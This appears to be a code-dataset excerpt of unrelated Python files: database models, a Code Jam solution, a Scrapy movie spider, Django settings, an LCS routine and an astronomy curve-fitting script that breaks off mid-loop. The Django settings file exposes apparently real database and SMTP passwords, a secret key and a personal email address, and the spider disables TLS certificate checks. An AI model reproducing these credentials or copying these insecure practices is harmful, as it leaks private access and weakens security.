boolean,\n\n tier_type tier_type_t,\n points_t1 int, userid_t1 int,\n points_t2 int, userid_t2 int,\n points_t3 int, userid_t3 int,\n points_t4 int, userid_t4 int,\n points_t5 int, userid_t5 int,\n points_t6 int, userid_t6 int,\n points_t7 int, userid_t7 int,\n points_t8 int, userid_t8 int,\n points_t9 int, userid_t9 int,\n points_t10 int, userid_t10 int,\n\n UNIQUE (serverid, event_id, tier_type, observation),\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n CREATE TABLE IF NOT EXISTS border_data_v3 (\n serverid varchar(8),\n event_id int,\n observation timestamp,\n is_last boolean,\n\n tier_type tier_type_t,\n points int,\n tier_from int,\n tier_to int,\n\n UNIQUE(serverid, event_id, tier_type, tier_to, observation),\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n CREATE TABLE IF NOT EXISTS border_t100_v1 (\n serverid varchar(8),\n event_id int,\n tier_type tier_type_t,\n\n rank int,\n points int,\n user_id int,\n user_name text,\n user_level int,\n center_card int,\n center_level int,\n awakened boolean,\n full_tree boolean,\n wield_title int,\n\n UNIQUE(serverid, event_id, tier_type, rank),\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n \"\"\"\n )\n\n async def have_event_info(self, region, event_id):\n async with self.pool.acquire() as c:\n row = await c.fetchrow(\n \"\"\"SELECT COUNT(0) FROM event_v2 WHERE serverid=$1 AND event_id=$2\"\"\",\n region,\n event_id,\n )\n if 
row[0]:\n return True\n return False\n\n async def have_final_tiers(self, region, event_id):\n async with self.pool.acquire() as c:\n row = await c.fetchrow(\n \"\"\"SELECT is_last FROM border_data_v3 WHERE serverid=$1 AND event_id=$2 AND is_last=TRUE\"\"\",\n region,\n event_id,\n )\n if row:\n return True\n return False\n\n async def get_event_timing(self, region, event_id):\n async with self.pool.acquire() as c:\n row = await c.fetchrow(\n \"\"\"SELECT end_t, result_t FROM event_v2 WHERE serverid=$1 AND event_id=$2\"\"\",\n region,\n event_id,\n )\n\n if not row:\n return None, None\n return row[0], row[1]\n\n async def get_event_status(self, region, event_id):\n async with self.pool.acquire() as c:\n desc = await c.fetchrow(\n \"\"\"\n SELECT start_t, end_t, result_t FROM event_v2 WHERE serverid=$1 AND event_id=$2\n LIMIT 1\n \"\"\",\n region,\n event_id,\n )\n\n if not desc:\n return None\n\n obs, fin = None, False\n last_collect = await c.fetchrow(\n \"\"\"\n SELECT observation, is_last FROM border_data_v3 WHERE serverid=$1 AND event_id=$2 \n ORDER BY observation DESC LIMIT 1\n \"\"\",\n region,\n event_id,\n )\n\n if last_collect:\n obs = last_collect[\"observation\"]\n fin = last_collect[\"is_last\"]\n\n return event_status_t(desc[\"start_t\"], desc[\"end_t\"], desc[\"result_t\"], obs, fin)\n\n async def add_event(\n self, region, event_id, event_title, banner, event_type, start, end, results, stories\n ):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"\"\"\n INSERT INTO event_v2 VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n \"\"\",\n region,\n event_id,\n event_title,\n banner,\n event_type,\n datetime.utcfromtimestamp(start),\n datetime.utcfromtimestamp(end),\n datetime.utcfromtimestamp(results),\n )\n\n await c.executemany(\n \"\"\"\n INSERT INTO event_story_v2 VALUES ($1, $2, $3, $4, $5, $6, $7)\n \"\"\",\n stories,\n )\n\n async def add_tiers(self, region, event_id, time, is_last, rows, singular):\n time = time.replace(second=0, microsecond=0)\n\n async with self.pool.acquire() as c, c.transaction():\n await c.executemany(\n \"\"\"\n INSERT INTO border_fixed_data_v3 VALUES\n ($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15,\n $16, $17, $18, $19, $20, $21, $22, $23, $24, $25)\n ON CONFLICT (serverid, event_id, tier_type, observation) DO NOTHING\n \"\"\",\n ((region, event_id, time, is_last, *r) for r in singular),\n )\n await c.executemany(\n \"\"\"\n INSERT INTO border_data_v3 VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n ON CONFLICT (serverid, event_id, tier_type, tier_to, observation) DO NOTHING\n \"\"\",\n ((region, event_id, time, is_last, *r) for r in rows),\n )\n\n async def add_t100(self, region, event_id, type_, rows):\n async with self.pool.acquire() as c, c.transaction():\n await c.executemany(\n \"\"\"\n INSERT INTO border_t100_v1 VALUES\n ($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13)\n ON CONFLICT (serverid, event_id, tier_type, rank) DO NOTHING \n \"\"\",\n ((region, event_id, type_, *r) for r in rows),\n )\n\n async def clear_norm_tiers(self, region, event_id):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\"DELETE FROM border_data_v3\")\n","sub_path":"maintenance/border/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"500535353","text":"_dir = \"./Google Code Jam 2017/Qualification Round/Tidy Numbers/\"\n\nt, lines, result = 0, [], []\nwith open(_dir + 
\"B-small-practice.in\") as f:\n    t = int(f.readline())\n    lines = f.readlines()\n\nfor line in lines:\n    for i in range(len(line)-2):\n        if (line[i] > line[i+1]):\n            line = line[0:i] + str(int(line[i])-1) + '9'*(len(line)-i-2)\n    result.append(''.join(line))\n\nwith open(_dir + \"result-small.txt\", \"w\") as f:\n    for i in range(len(result)):\n        f.write(\"Case #\" + str(i+1) + \": \" + str(int(result[i])) + \"\\n\")\n\n# error when 111110","sub_path":"Google Code Jam 2017/Qualification Round/Tidy Numbers/tidyNumber.py","file_name":"tidyNumber.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"596544042","text":"\"\"\"\nadd_owner_ids.py\n\nQuery Elasticsearch using Safe ID and campus to write back out with OwnerId.\n\"\"\"\n\nimport argparse\nimport csv\n\nimport sys\nfrom os import pardir, path\nfilepath = path.abspath(__file__)\nparent_dir = path.abspath(path.join(filepath, pardir))\npackage_dir = path.abspath(path.join(parent_dir, pardir))\nsys.path.insert(0, package_dir)\n\nfrom elasticsearch_dsl import Search\nfrom elasticsearch_dsl.connections import connections as es_connections\nimport requests\n\nfrom salesforce_fields import contact_note as cn_fields\nfrom secrets.elastic_secrets import ES_CONNECTION_KEY\n\nCONTACT_UNKNOWN_STRING = \"StillNotFound\"\n\n\ndef write_owner_ids(csv_filename, campus):\n    \"\"\"\n    Query Elasticsearch using Safe ID and campus to write back out with OwnerId.\n    \"\"\"\n\n    with open(csv_filename) as csvfile:\n        reader = csv.DictReader(csvfile)\n\n        outfile_name = \"ownerids_{}\".format(csv_filename)\n        with open(outfile_name, 'w') as outfile:\n            # make sure the output header has an OwnerId column before writing rows\n            fieldnames = reader.fieldnames\n            if \"OwnerId\" not in fieldnames:\n                fieldnames = fieldnames + [\"OwnerId\"]\n            writer = csv.DictWriter(outfile, fieldnames=fieldnames)\n            writer.writeheader()\n\n            for row in reader:\n                if row[cn_fields.CONTACT] != CONTACT_UNKNOWN_STRING:\n                    ac_safe_id = get_owner_id(campus, row[cn_fields.CONTACT])\n                    row[\"OwnerId\"] = ac_safe_id\n                writer.writerow(row)\n\n\ndef get_owner_id(campus, safe_id):\n    \"\"\"\n    Query Elasticsearch using alum's Salesforce ID to get the OwnerId.\n\n    Parameters:\n    * campus: str campus name (Elastic index to query)\n    * safe_id: str alum's Salesforce ID\n\n    Returns the Safe Id for the AC/Owner of the alum if found.\n    If no results, returns \"Unknown\".\n    \"\"\"\n\n    s = Search().from_dict({\n        \"query\": {\n            \"match\": {\n                \"safe_id\": safe_id,\n            }\n        }\n    })\n    s = s.index(campus)\n\n    results = s.execute()\n    if len(results) == 0:\n        return \"Unknown\"\n    elif len(results) == 1:\n        return results[0].ac_safe_id\n\n\ndef parse_args():\n    \"\"\"Get input filename and campus.\"\"\"\n\n    parser = argparse.ArgumentParser(description=\"Specify input file\")\n    parser.add_argument(\n        'infile',\n        help=\"Input csv file\",\n    )\n    parser.add_argument(\n        'campus',\n        default=None,\n        help=\"Campus (index) to query against\",\n    )\n\n    return parser.parse_args()\n\n\nif __name__=='__main__':\n    args = parse_args()\n    es_connection = es_connections.create_connection(\n        hosts=[ES_CONNECTION_KEY]\n    )\n    write_owner_ids(args.infile, args.campus)\n","sub_path":"add_owner_ids.py","file_name":"add_owner_ids.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"342319647","text":"import sys\nimport Leap\nfrom pygameWindow import PYGAME_WINDOW\nimport constants as c\nimport random\n\nsys.path.insert(0, '...')\npygameWindow = PYGAME_WINDOW()\n\nx = c.pygameWindowWidth/2\ny = c.pygameWindowDepth/2\n\n\nxMin = 
1000.0\nxMax = -1000.0\nyMin = 1000.0\nyMax = -1000.0\n\n\ndef Perturb_Circle_Position():\n global x, y\n fourSidedDieRoll = random.randint(1,4)\n if fourSidedDieRoll == 1:\n x += 1\n if fourSidedDieRoll == 2:\n x -= 1\n if fourSidedDieRoll == 3:\n y -= 1\n if fourSidedDieRoll == 4:\n y += 1\n\n\nprint(pygameWindow)\ncontroller = Leap.Controller()\n\nnumhands = 0\nwhile True:\n pygameWindow.Prepare()\n frame = controller.frame()\n hands = frame.hands\n\n\n handlist = frame.hands\n\n def Handle_Frame(frame):\n global x, y\n global xMin, xMax, yMin, yMax\n hand = frame.hands[0]\n #print(hand)\n fingers = hand.fingers\n indexFingerList = fingers.finger_type(Leap.Finger.TYPE_INDEX)\n indexFinger = indexFingerList[0]\n distalPhalanx = indexFinger.bone(3)\n tip = distalPhalanx.next_joint\n\n x = int(tip[0])\n y = int(tip[1])\n\n if x < xMin:\n xMin = x\n if x > xMax:\n xMax = x\n if y < yMin:\n yMin = y\n if y > yMax:\n yMax = y\n print(\"Xval:\"+str(x), \"YVal:\"+str(y))\n\n def Scale(OldValue, OldMin, OldMax, NewMin, NewMax):\n # Set the scale defined by the newmin and newmax value\n # between_min_max = between_min_max * (newmin + newmax)\n # Don't let OldMax = OldMin\n if OldMax == OldMin:\n OldMax += 0.1\n between_min_max = (((OldValue - OldMin) * (NewMax - NewMin)) / (OldMax - OldMin)) + NewMin\n\n between_min_max = int(between_min_max)\n\n # print(\"The Scaled Value:\",between_min_max)\n\n return between_min_max\n\n # If the Frame is empty say there are no hands\n if frame.hands.is_empty:\n handPresent = False\n numhands = 0\n\n if not frame.hands.is_empty:\n handPresent = True\n numhands = frame.hands\n\n Handle_Frame(frame)\n\n pygameX = Scale(x, xMin, xMax, 0, c.pygameWindowWidth)\n\n # Invert the Y so we flip the two last values.\n pygameY = Scale(y, yMin, yMax, c.pygameWindowDepth, 0)\n\n # The yMin was too low for me to be able to touch the bottom of the frame\n yMin = 70\n # Perturb_Circle_Position()\n\n\n pygameWindow.Draw_Black_Circle(pygameX, pygameY)\n pygameWindow.Reveal()\n\n\n\n\n\n","sub_path":"Del01.py","file_name":"Del01.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210425348","text":"\"\"\"The longest common subsequence problem is the problem of finding the longest subsequence common to all sequences\nin a set of sequences. It differs from the longest common substring problem: unlike substrings, subsequences are not\nrequired to occupy consecutive positions within the original sequences. 
\"\"\"\n\n\"\"\"For better understanding watch the video https://youtu.be/sSno9rV8Rhg\"\"\"\n\n\ndef lcs(string1, string2):\n    m = len(string1)\n    n = len(string2)\n\n    l = [[None for _ in range(n + 1)] for _ in range(m + 1)]\n\n    for i in range(m + 1):\n        for j in range(n + 1):\n            if i == 0 or j == 0:\n                l[i][j] = 0\n\n            elif string1[i - 1] == string2[\n                j - 1]:  # check whether the characters of the two strings match; matrix indices are one ahead of string indices, so reduce them by 1\n                l[i][j] = 1 + l[i - 1][j - 1]  # on a match, add 1 to the diagonal value and store it at the current index\n\n            else:\n                l[i][j] = max(l[i - 1][j],\n                              l[i][j - 1])  # otherwise store the max of the values from the previous row and previous column\n\n    return l\n\n\nstring1 = \"BDCB\"\nstring2 = \"BACDB\"\n\na = lcs(string1, string2)\nprint(a)\nprint(\"Longest Sequences \", a[-1][-1])\n\nl1 = len(string1)\nl2 = len(string2)\n\nsequence = []\nval = None\n\nwhile val != 0:  # continue the loop until a zero value is reached\n    if a[l1][l2] == a[l1][l2 - 1]:  # if the value to the left in the same row is equal, move one column left\n        l2 -= 1\n    else:\n        # otherwise record the matched character and move one row and one\n        # column up (one level up the matrix)\n        val = a[l1 - 1][l2 - 1]\n        sequence.insert(0, string2[l2 - 1])  # insert the matched character at the front\n        l1 -= 1\n        l2 -= 1\nprint(\"Sequence is\", \"\".join(sequence))\n","sub_path":"DynamicApproach/LongestCommonSequence.py","file_name":"LongestCommonSequence.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"168636298","text":"################### create Movie of configs #####################\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"Agg\")  # the backend must be selected before pyplot is imported\nimport matplotlib.pyplot as plt\nfrom mmc_LJ_trap import *\nu, coordinates = mmc()\nimport matplotlib.animation as manimation\n\nFFMpegWriter = manimation.writers['ffmpeg']\nmetadata = dict(title='Movie Test', artist='Matplotlib',\n                comment='Movie support!')\nwriter = FFMpegWriter(fps=20, metadata=metadata)\n\nfig = plt.figure()\nl, = plt.plot([], [], 'ro')\nplt.setp(l, markersize=30)\nplt.setp(l, markerfacecolor='C0') \n\n\nplt.xlim(-5, 5)\nplt.ylim(-5, 5)\n\nx, y = np.zeros(N_particles), np.zeros(N_particles)\n\nwith writer.saving(fig, \"movie_of_configs.mp4\", 100):\n\tfor _ in range(mc_steps):\n\t\tcoord = coordinates[_]\n\t\tfor i in range(N_particles):\n\t\t\tx[i] = coord[i, -1]\n\t\t\ty[i] = coord[i, 0]\n\t\tl.set_data(x, y)\n\t\twriter.grab_frame()\n","sub_path":"projects/project_6/Shipra_Yaoyi_Louis_Lucas/movie_maker.py","file_name":"movie_maker.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"647966680","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport requests\nfrom lxml import etree\nfrom MovieCrawl.items import MoviecrawlItem\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n# disable insecure-request warnings\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef getHTMLTEXT(url):\n    try:\n        response = requests.get(url, timeout=30, verify=False)\n        response.raise_for_status()\n        if 'charset' not in response.headers.keys(): # make sure the encoding is detected correctly\n            response.encoding = response.apparent_encoding\n        return response.text\n    except:\n        return 'getHTMLTEXT Error!'\n    \n\nclass MovieSpider(scrapy.Spider):\n    name = 'Movie'\n    allowed_domains = ['80s.tw/movie']\n\n    def start_requests(self):\n        
pageUrlPrefix = 'https://www.80s.tw/movie/list/-----p' # prefix of the listing-page URL\n        crawlNum = 400\n        thisPageMovieLinkPrefix = 'https://www.80s.tw'\n        for eachNum in range(crawlNum):\n            pageUrl = pageUrlPrefix + str(eachNum+1)\n            htmlTEXT = getHTMLTEXT(pageUrl) # fetch the HTML text of each listing page\n            html = etree.HTML(htmlTEXT) # parse the HTML text with lxml.etree\n            thisPageMovieTags = html.xpath('//*[@id=\"block3\"]/div[3]/ul[2]/li/a') # links to all movies on this page\n            for eachTag in thisPageMovieTags:\n                thisPageMovieLinkSuffix = eachTag.attrib['href'] # href is only a suffix, so concatenate it with the prefix\n                thisPageMOvieLink = thisPageMovieLinkPrefix + thisPageMovieLinkSuffix\n                yield scrapy.Request(url=thisPageMOvieLink, callback=self.parseFunc)\n\n\n    def parseFunc(self, response):\n        item = MoviecrawlItem()\n        element = response.xpath('//*[@id=\"minfo\"]/div[1]/img')\n        try:\n            pcitreLink = element[0].xpath('@src').extract()[0]\n            item['pictureLink'] = pcitreLink\n        except IndexError:\n            item['pictureLink'] = 'Picture Not Found!\\n The Link is ' + response.url\n        try:\n            title = element[0].xpath('@title').extract()[0]\n            item['cineName'] = title\n        except IndexError:\n            item['cineName'] = 'CineName Not Found\\n The Link is ' + response.url\n        try:\n            downloadLink = response.xpath('//*[@id=\"myform\"]/ul/li[2]/span[3]/a/@href').extract()[0]\n            item['downloadLink'] = downloadLink\n        except IndexError:\n            item['downloadLink'] = 'Download Link Not Found!\\n The Link is ' + response.url\n        try:\n            iD = response.xpath('//*[@id=\"wap-enter\"]/a/@href').extract()[0].split('/')[-1]\n            item['iD'] = iD\n        except IndexError:\n            item['iD'] = 'ID Not Found!\\n The Link is ' + response.url\n\n        yield item","sub_path":"ScrapyProject/MovieCrawl/MovieCrawl/spiders/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"120849115","text":"\nimport os\nPROJECT_DIR = os.path.dirname(__file__)\n# Django settings for allenrutherford project.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n    # ('Your Name', 'your_email@domain.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n        'NAME': 'jones124_resp', # Or path to database file if using sqlite3.\n        'USER': 'jones124_resp', # Not used with sqlite3.\n        'PASSWORD': 'Ueisugi9', # Not used with sqlite3.\n        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n        'PORT': '', # Set to empty string for default. Not used with sqlite3.\n    }\n}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/London'\n\n# Language code for this installation. 
All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-gb'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media/')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media-admin/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'caiu*u-%jkmzk!c%!0plodg@2^3l$*!phjvx#&&lu5igc-6udh'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n# 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'resp.urls'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.sites\",\n \"django.contrib.admin\",\n \"django.contrib.comments\",\n \"resp.smartpages\",\n \"paston_stuff.tagsnfilters\",\n \"paston_stuff.thumbnails\",\n \"django.contrib.markup\",\n \"resp.docupload\",\n \"resp.rightfeature\",\n \"resp.contact\",\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n\"django.core.context_processors.auth\",\n\"django.core.context_processors.debug\",\n\"django.core.context_processors.i18n\",\n\"django.core.context_processors.media\",\n#\"news.context_processors.latestnews\",\n\"cp.meta_processor\")\n\n\nTEMPLATE_DIRS = (os.path.join(PROJECT_DIR, 'templates/'),)\nDATABASE_ENGINE = 'mysql'\n\nEMAIL_HOST = 'localhost'\nEMAIL_SUBJECT_PREFIX = '[] '\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\nDEFAULT_FROM_EMAIL = 'no-reply@resp.jones124.webfactional.com'\nLOCAL_DEV = False\n\n#CONTACT_EMAIL_TO = 'jon+juniortest@wearefarm.com'\nCONTACT_EMAIL_TO = 'mike_k_jones@hotmail.com'\n\nEMAIL_HOST = 'smtp.webfaction.com'\nEMAIL_HOST_PASSWORD = '0a8599a7'\nEMAIL_HOST_USER = 'jones124'\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"464275645","text":"# based on GP_85390_celerite_2_planets.py\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom rv import solve_kep_eqn\n\n#==============================================================================\n# Import data 
\n#==============================================================================\n\nall_rvs = np.loadtxt('HD85390_quad.vels')\nRV_HARPS = np.loadtxt('RV_HARPS.dat')\n\nx \t\t= all_rvs[:,0]\ny = (RV_HARPS-np.mean(RV_HARPS))*1000\nyerr \t= all_rvs[:,2]\n\nimport time\nimport os\nimport shutil\ntime0 = time.time()\ndir_name = 'celerite' + str(time0)\nos.makedirs(dir_name)\nshutil.copy('GP_85390_celerite_1_planet.py', dir_name +'/GP_85390_celerite_1_planet.py') \nos.chdir(dir_name)\n\nplt.figure()\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0)\nplt.ylabel(\"RV [m/s]\")\nplt.xlabel(\"Shifted JD [d]\")\nplt.savefig('HD85390-1-RV.png')\n# plt.show()\n\n#==============================================================================\n# Model\n#==============================================================================\nimport celerite\nfrom celerite.modeling import Model\n\nclass Model(Model):\n parameter_names = ('P1', 'tau1', 'k1', 'w1', 'e1', 'offset1', 'offset2')\n\n def get_value(self, t):\n\n # Planet 1\n M_anom1 = 2*np.pi/(100*self.P1) * (t - 1000*self.tau1)\n e_anom1 = solve_kep_eqn(M_anom1, self.e1)\n f1 = 2*np.arctan( np.sqrt((1+self.e1)/(1-self.e1))*np.tan(e_anom1*.5) )\n rv1 = 100*self.k1*(np.cos(f1 + self.w1) + self.e1*np.cos(self.w1))\n\n offset = np.zeros(len(t))\n idx = t < 57300\n offset[idx] = self.offset1\n offset[~idx]= self.offset2\n\n return rv1 + offset\n\ntruth = dict(P1=8., tau1=1., k1=np.std(y)/100, w1=0., e1=0.4, offset1=0., offset2=0.)\nkwargs = dict(**truth)\nkwargs[\"bounds\"] = dict(P1=(7.5,8.5), k1=(0,0.1), w1=(-2*np.pi,2*np.pi), e1=(0,0.8))\nmean_model = Model(**kwargs)\n\n#==============================================================================\n# The fit\n#==============================================================================\nfrom scipy.optimize import minimize\n\nimport celerite\nfrom celerite import terms\n\n# Set up the GP model\n# kernel = terms.RealTerm(log_a=np.log(np.var(y)), log_c=-np.log(10.0))\nkernel = terms.SHOTerm(log_S0=np.log(2), log_Q=np.log(20), log_omega0=np.log(1/3000))\ngp = celerite.GP(kernel, mean=mean_model, fit_mean=True)\ngp.compute(x, yerr)\nprint(\"Initial log-likelihood: {0}\".format(gp.log_likelihood(y)))\n\n# Define a cost function\ndef neg_log_like(params, y, gp):\n gp.set_parameter_vector(params)\n return -gp.log_likelihood(y)\n\n# def grad_neg_log_like(params, y, gp):\n# gp.set_parameter_vector(params)\n# return -gp.grad_log_likelihood(y)[1]\n\n# Fit for the maximum likelihood parameters\ninitial_params = gp.get_parameter_vector()\nbounds = gp.get_parameter_bounds()\nsoln = minimize(neg_log_like, initial_params, method=\"L-BFGS-B\", bounds=bounds, args=(y, gp))\ngp.set_parameter_vector(soln.x)\nprint(\"Final log-likelihood: {0}\".format(-soln.fun))\n\n# Make the maximum likelihood prediction\nt = np.linspace(min(x), max(x), 10000)\nmu, var = gp.predict(y, t, return_var=True)\nstd = np.sqrt(var)\n\n# Plot the data\n# plt.figure()\ncolor = \"#ff7f0e\"\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0)\nplt.plot(t, mu, color=color)\nplt.fill_between(t, mu+std, mu-std, color=color, alpha=0.3, edgecolor=\"none\")\nplt.ylabel(r\"$y$\")\nplt.xlabel(r\"$t$\")\n# plt.gca().yaxis.set_major_locator(plt.MaxNLocator(5))\nplt.title(\"maximum likelihood prediction\");\nplt.savefig('HD85390-5-min-prediction.png')\nplt.show()\n\n#==============================================================================\n# MCMC\n#==============================================================================\n# Define the posterior 
PDF\n# Reminder: post_pdf(theta, data) = likelihood(data, theta) * prior_pdf(theta)\n# We take the logarithm since emcee needs it.\n\n# As prior, we assume an 'uniform' prior (i.e. constant prob. density)\n\ndef lnprior(params):\n _, _, _, P1, tau1, k1, w1, e1, offset1, offset2 = params\n if (7.5 < P1 < 8.5) and (0 < k1 < 0.1) and (-2*np.pi < w1 < 2*np.pi) and (0 < e1 < 0.8): \n return 0.0\n return -np.inf\n\n# As likelihood, we assume the chi-square. Note: we do not even need to normalize it.\n# def lnlike(theta):\n# P1, tau1, k1, w1, e1, P2, tau2, k2, w2, e2, offset1, offset2 = theta\n# fit_curve = Model(P1=P1, tau1=tau1, k1=k1, w1=w1, e1=e1, \n# P2=P2, tau2=tau2, k2=k2, w2=w2, e2=e2, offset1=offset1, offset2=offset2)\n# y_fit = fit_curve.get_value(x)\n# return -0.5*(np.sum( ((y-y_fit)/yerr)**2))\n\ndef lnprob(params):\n gp.set_parameter_vector(params)\n lp = lnprior(params)\n # lp = gp.log_prior()\n if not np.isfinite(lp):\n return -np.inf\n return gp.log_likelihood(y) + lp\n\n\nimport emcee\ninitial = gp.get_parameter_vector()\n# initial = np.array(initial_params)\n# initial = np.array(soln.x)\nndim, nwalkers = len(initial), 32\nsampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, threads=14)\n\nimport time\ntime_start = time.time()\n\nprint(\"Running first burn-in...\")\npos = initial + 1e-4 * np.random.randn(nwalkers, ndim)\npos, prob, _ = sampler.run_mcmc(pos, 3000)\n\n\nprint(\"Running second burn-in...\")\npos = pos[np.argmax(prob)] + 1e-4 * np.random.randn(nwalkers, ndim)\npos, prob, _ = sampler.run_mcmc(pos, 2000)\n\n# print(\"Running third burn-in...\")\n# pos = pos[np.argmax(prob)] + 1e-8 * np.random.randn(nwalkers, ndim)\n# pos, prob, _ = sampler.run_mcmc(pos, 2000)\n\nprint(\"Running production...\")\n# pos = pos[np.argmax(prob)] + 1e-4 * np.random.randn(nwalkers, ndim)\n# pos, prob, state = sampler.run_mcmc(pos, 3000)\n# sampler.reset()\nsampler.run_mcmc(pos, 3000);\n\ntime_end = time.time()\nprint('\\nRuntime = %.2f seconds' %(time_end - time_start))\n\n\n#==============================================================================\n# Trace and corner plots \n#==============================================================================\n\nimport copy\nraw_samples = sampler.chain[:, 3000:6000, :].reshape((-1, ndim))\nreal_samples = copy.copy(raw_samples)\nreal_samples[:,4] = 10*real_samples[:,4]\nreal_samples[:,9] = 10*real_samples[:,9]\nreal_samples[:,3:6] = 100*real_samples[:,3:6]\nreal_samples[:,8:11] = 100*real_samples[:,8:11]\nidx = real_samples[:,6] > 0\nreal_samples[idx,6] = real_samples[idx, 5] - 2*np.pi\nidx = real_samples[:,11] < 0\nreal_samples[idx,11] = real_samples[idx, 11] + 2*np.pi\n\n# import copy\n# raw_samples = sampler.chain[:, 3000:6000, :].reshape((-1, ndim))\n# real_samples = copy.copy(raw_samples)\n# real_samples[:,3] = 10*real_samples[:,3]\n# real_samples[:,8] = 10*real_samples[:,8]\n# real_samples[:,2:5] = 100*real_samples[:,2:5]\n# real_samples[:,7:10] = 100*real_samples[:,7:10]\n# idx = real_samples[:,5] > 0\n# real_samples[idx,5] = real_samples[idx, 5] - 2*np.pi\n# idx = real_samples[:,10] < 0\n# real_samples[idx,10] = real_samples[idx, 10] + 2*np.pi\n\n\nfig, axes = plt.subplots(ndim, figsize=(20, 14), sharex=True)\nlabels_log=[\"1\", \"2\", \"3\", r\"$\\frac{P_{1}}{100}$\", r\"$\\frac{T_{1}}{1000}$\", r\"$\\frac{K_{1}}{100}$\", r\"$\\omega1$\", r\"$e1$\", \n r\"$\\frac{P_{2}}{100}$\", r\"$\\frac{T_{2}}{1000}$\", r\"$\\frac{K_{2}}{100}$\", r\"$\\omega2$\", r\"$e2$\", \n \"offset1\", \"offset2\"]\nfor i in range(ndim):\n ax = axes[i]\n 
